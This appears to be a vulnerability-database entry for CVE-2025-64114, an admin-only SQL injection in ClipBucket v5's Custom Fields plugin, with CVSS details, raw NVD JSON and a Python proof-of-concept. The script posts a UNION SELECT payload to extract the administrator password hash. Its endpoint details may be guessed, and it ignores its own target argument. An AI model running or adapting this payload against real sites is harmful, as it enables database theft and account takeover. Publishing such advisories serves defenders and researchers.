Security Vulnerability Report
中文
CVE-2025-64114 CVSS 6.5 MEDIUM

CVE-2025-64114

Published: 2025-11-06 00:15:38
Last Modified: 2025-11-10 17:26:25
Source: [email protected]

Description

ClipBucket v5 is an open source video sharing platform. Versions 5.5.2 - #151 and below allow authenticated administrators with plugin management privileges to execute arbitrary SQL commands against the database through its ClipBucket Custom Fields plugin. The vulnerabilities require the Custom Fields plugin to be installed and accessible, and can only be exploited by users with administrative access to the plugin interface. This issue is fixed in version 5.5.2 - #.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:oxygenz:clipbucket:*:*:*:*:*:*:*:* - VULNERABLE
ClipBucket v5.5.2 - #151 及以下版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64114 ClipBucket Custom Fields SQL Injection PoC # Requirements: Authenticated admin access with plugin management privileges # Target: ClipBucket v5 with Custom Fields plugin installed import requests import sys TARGET_URL = "http://target-clipbucket.com" ADMIN_PATH = "/admin/plugin.php" LOGIN_URL = f"{TARGET_URL}/login.php" def login(session, username, password): """Authenticate as admin user""" login_data = { "username": username, "password": password, "submit": "Login" } response = session.post(LOGIN_URL, data=login_data, allow_redirects=True) return "logged_in" in response.text or response.status_code == 200 def exploit_sql_injection(session): """ SQL Injection via Custom Fields plugin parameter Modify the 'field_name' or 'field_value' parameter with malicious SQL payload """ # Malicious SQL payload - extract admin password hash sql_payload = "' UNION SELECT password FROM cb_users WHERE userid=1--" exploit_data = { "plugin": "custom_fields", "action": "save_field", "field_name": sql_payload, "field_type": "text", "submit": "Save" } response = session.post( f"{TARGET_URL}{ADMIN_PATH}", data=exploit_data, headers={"Content-Type": "application/x-www-form-urlencoded"} ) return response def main(): if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <admin_user> <admin_pass>") sys.exit(1) target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] session = requests.Session() print(f"[*] Logging in as {username}...") if not login(session, username, password): print("[-] Authentication failed") sys.exit(1) print("[+] Authentication successful") print("[*] Exploiting SQL injection in Custom Fields plugin...") response = exploit_sql_injection(session) if response.status_code == 200: print("[+] Exploit sent - check response for data extraction") else: print(f"[-] Exploit failed with status code: {response.status_code}") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64114", "sourceIdentifier": "[email protected]", "published": "2025-11-06T00:15:37.980", "lastModified": "2025-11-10T17:26:24.800", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ClipBucket v5 is an open source video sharing platform. Versions 5.5.2 - #151 and below allow authenticated administrators with plugin management privileges to execute arbitrary SQL commands against the database through its ClipBucket Custom Fields plugin. The vulnerabilities require the Custom Fields plugin to be installed and accessible, and can only be exploited by users with administrative access to the plugin interface. This issue is fixed in version 5.5.2 - #."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oxygenz:clipbucket:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.3", "versionEndExcluding": "5.5.2-152", "matchCriteriaId": "EDA8A1DA-F10C-482F-904C-3519CE1D4198"}]}]}], "references": [{"url": "https://github.com/MacWarrior/clipbucket-v5/commit/b7289923177fe533ae908654ee3cd65b63ffb008", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/MacWarrior/clipbucket-v5/releases/tag/5.5.2-%23152", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/MacWarrior/clipbucket-v5/security/advisories/GHSA-4g7x-j562-8g69", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.